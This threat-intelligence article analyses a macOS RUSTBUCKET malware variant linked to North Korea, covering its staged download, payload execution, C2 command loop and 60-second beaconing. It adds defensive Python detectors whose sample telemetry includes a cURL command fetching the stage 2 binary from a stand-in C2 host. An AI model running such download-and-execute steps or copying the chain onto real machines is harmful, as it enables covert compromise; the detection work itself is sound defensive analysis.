A DPRK-linked campaign is using a recently updated version of the RUSTBUCKET malware to evade detection.
This variant of RUSTBUCKET targets macOS systems, adds persistence capabilities not previously observed and, at the time of reporting, was not detected by any VirusTotal signature engine.
The Elastic Security Labs team has identified a new variant of the RUSTBUCKET malware, a family previously attributed to the BlueNoroff group by Jamf Threat Labs in April 2023.
The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue.
RUSTBUCKET Malware Infection Chain
According to the research, the RUSTBUCKET malware family is under active development. At the time of publication this variant had zero detections on VirusTotal and relied on a dynamically changing network infrastructure for command and control.
Stage 1 uses /usr/bin/osascript to run an AppleScript that downloads the Stage 2 binary from the C2 server with cURL.
The request carries the string pd in the HTTP body and cur1-agent as the User-Agent, and the downloaded Stage 2 binary is saved to /users/shared/.pd.
The Stage 2 binary (.pd) is written in Swift and is driven by command-line arguments: it expects the C2 URL as its first parameter.
Upon execution it calls the downAndExec function, which prepares an HTTP POST request.
For this request the binary sets the User-Agent to mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) and places the string pw in the request body.
To stage the response it uses standard macOS APIs: NSFileManager's temporaryDirectory to obtain the current temporary folder, then NSUUID's UUID.init to generate a random UUID.
It joins the temporary directory path and the UUID into a unique file location and writes the downloaded payload there.
Once the payload is on disk, the malware launches it with NSTask.
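The Stage 1 and Stage 2 behaviour above leaves a recognisable trail in process telemetry: cURL carrying the cur1-agent User-Agent or writing /users/shared/.pd, followed by .pd launching a UUID-named file out of the temporary directory. The following is an added example of that check, not Elastic's code; the event schema, the sample events and the assumption that NSFileManager.temporaryDirectory resolves to a /var/folders/.../T/ path are mine, while the indicators themselves come from the text.

```python
"""Process-telemetry check for the stage 1 -> stage 2 hand-off described above.
Added example, not Elastic's code; the event schema and the temp-directory
layout are assumptions, the indicators (cur1-agent, /users/shared/.pd, a
UUID-named file in the temporary directory) come from the text."""
import re
from dataclasses import dataclass

STAGE1_UA = "cur1-agent"            # User-Agent of the stage 1 cURL download
STAGE2_PATH = "/users/shared/.pd"   # where stage 1 saves the Swift binary

# NSFileManager.temporaryDirectory resolves to $TMPDIR, which on macOS looks
# like /var/folders/xx/yyyyyyyy/T/ (assumption about the host layout).
UUID_IN_TMP_RE = re.compile(
    r"^(?:/private)?/var/folders/[^/]+/[^/]+/T/"
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
)


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the parent process
    image: str    # image path of the spawned process
    cmdline: str  # full command line of the spawned process


def is_stage1_download(ev):
    """cURL carrying the cur1-agent UA or writing the stage 2 drop path."""
    cmd = ev.cmdline.lower()
    return ev.image.endswith("/curl") and (STAGE1_UA in cmd or STAGE2_PATH in cmd)


def is_stage2_launch(ev):
    """The .pd binary executing a UUID-named file out of the temp directory."""
    return ev.parent.lower() == STAGE2_PATH and bool(UUID_IN_TMP_RE.match(ev.image))


def scan(events):
    """Return (label, event) for every event matching one of the two stages."""
    hits = []
    for ev in events:
        if is_stage1_download(ev):
            hits.append(("stage1_download", ev))
        elif is_stage2_launch(ev):
            hits.append(("stage2_launch", ev))
    return hits


# Constructed sample telemetry; nothing here is from a real incident.
SAMPLE_EVENTS = [
    ProcEvent("/usr/bin/osascript", "/usr/bin/curl",
              "curl -X POST -d pd -A cur1-agent -o /users/shared/.pd http://c2.example.invalid/"),
    ProcEvent("/users/shared/.pd",
              "/var/folders/ab/cdefgh1234567890/T/9F1C2B3A-4D5E-4F60-8A7B-1234567890AB",
              "/var/folders/ab/cdefgh1234567890/T/9F1C2B3A-4D5E-4F60-8A7B-1234567890AB"),
    ProcEvent("/bin/zsh", "/usr/bin/curl",
              "curl -o /Users/Shared/notes.txt https://files.example.invalid/notes.txt"),
    ProcEvent("/usr/bin/osascript", "/usr/bin/curl",
              "curl -o /Users/me/Downloads/update.pkg https://files.example.invalid/update.pkg"),
]

if __name__ == "__main__":
    for label, ev in scan(SAMPLE_EVENTS):
        print(f"{label}: {ev.parent} -> {ev.image}")
```

The two benign cURL events are deliberately close misses: a download into /Users/Shared and an osascript-spawned cURL with a normal User-Agent neither trip the rule, because the match keys on the specific User-Agent and drop path rather than on osascript or cURL alone.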
Gathers System Information
The executed payload begins by generating a 16-byte random value at runtime, which serves as a unique identifier for that instance of the malware. It then gathers system information, including:
- Computer name
- List of active processes
- Current timestamp
- Installation timestamp
- System boot time
- Status of all running processes within the system
The malware makes its initial connection to the C2 server by sending the gathered data in a POST request with the User-Agent string Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0).
The C2 server answers with a command ID that instructs the malware. Only two commands are supported:
- Command ID 0x31: self-terminate.
- Command ID 0x30: receive a Mach-O binary or shell script uploaded by the operator and execute it.
For command 0x30 the malware marks the uploaded file executable with chmod and runs it. After the payload has executed it sends a status update to the server reporting completion, then sleeps for 60 seconds.
After the delay it loops back to collect system information again and waits for the next command from the server.
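The command loop above produces a steady beacon: a macOS host POSTing to the same destination roughly every 60 seconds with a User-Agent that claims to be Internet Explorer 8 on Windows XP. The following is an added example, not Elastic's code, of turning that into a detection over HTTP proxy logs: it groups POSTs by source, destination and User-Agent, keeps only groups from hosts an inventory says are macOS, and flags those whose inter-request gaps cluster around the sleep interval. The log format, the host inventory and the sample lines are constructed; the User-Agent string and the 60-second interval come from the text, and the comparison is case-insensitive because the Stage 2 and Stage 3 components spell the User-Agent with different capitalisation.

```python
"""Beacon detection for the stage 3 C2 loop described above.
Added example, not Elastic's code; the proxy log format, the host inventory
and the sample lines are constructed, the User-Agent and the 60-second sleep
come from the text."""
import re
from collections import defaultdict
from statistics import median

# Indicator from the text, lower-cased so both spellings on the page match.
IE8_UA = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)"

# Constructed inventory: source IP -> operating system (e.g. exported from MDM).
HOST_OS = {"10.0.0.5": "macOS", "10.0.0.9": "Windows", "10.0.0.12": "macOS"}

# Constructed log format: <epoch> <src_ip> <method> <dst_host> "<user_agent>"
LINE_RE = re.compile(r'^(\d+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, method, dst, ua = m.groups()
    return {"ts": int(ts), "src": src, "method": method, "dst": dst, "ua": ua}


def find_beacons(lines, period=60, tolerance=10, min_hits=3):
    """Flag macOS hosts POSTing with the IE8 UA at ~period-second intervals.

    The malware sleeps 60 s and then does work before the next POST, so the
    observed gap is a little above 60 s; the tolerance absorbs that."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST":
            groups[(rec["src"], rec["dst"], rec["ua"].lower())].append(rec["ts"])

    alerts = []
    for (src, dst, ua), stamps in groups.items():
        if ua != IE8_UA or HOST_OS.get(src) != "macOS" or len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        gap = median(gaps)
        if abs(gap - period) <= tolerance:
            alerts.append({"src": src, "dst": dst, "count": len(stamps), "median_gap": gap})
    return alerts


UA_MIXED = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
UA_LOWER = "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)"

# Constructed sample log: one macOS beacon, one Windows host with the same UA,
# one macOS host with the UA but no regular cadence, plus normal browsing.
SAMPLE_LOG = [
    f'1700000000 10.0.0.5 POST c2.example.invalid "{UA_LOWER}"',      # stage 2 (lowercase UA)
    f'1700000063 10.0.0.5 POST c2.example.invalid "{UA_MIXED}"',      # stage 3 beacons
    f'1700000125 10.0.0.5 POST c2.example.invalid "{UA_MIXED}"',
    f'1700000189 10.0.0.5 POST c2.example.invalid "{UA_MIXED}"',
    f'1700000252 10.0.0.5 POST c2.example.invalid "{UA_MIXED}"',
    '1700000030 10.0.0.5 GET www.example.invalid "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) Safari/605.1.15"',
    f'1700000000 10.0.0.9 POST intranet.example.invalid "{UA_MIXED}"',  # Windows host: UA plausible
    f'1700000060 10.0.0.9 POST intranet.example.invalid "{UA_MIXED}"',
    f'1700000120 10.0.0.9 POST intranet.example.invalid "{UA_MIXED}"',
    f'1700000000 10.0.0.12 POST c2.example.invalid "{UA_MIXED}"',      # macOS but irregular
    f'1700000010 10.0.0.12 POST c2.example.invalid "{UA_MIXED}"',
    f'1700000300 10.0.0.12 POST c2.example.invalid "{UA_MIXED}"',
    "this line is malformed and is skipped",
]

if __name__ == "__main__":
    for a in find_beacons(SAMPLE_LOG):
        print(f"beacon: {a['src']} -> {a['dst']} ({a['count']} POSTs, median gap {a['median_gap']}s)")
```

The OS/User-Agent mismatch is what keeps the rule quiet on the Windows host, and the cadence test is what separates the beacon from a macOS host that merely used the same User-Agent a few times; either signal alone would be noisy on its own.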
The multi-stage design, the use of the Rust programming language and the focus on macOS together make detection and prevention a significant challenge.
Indicator of compromise: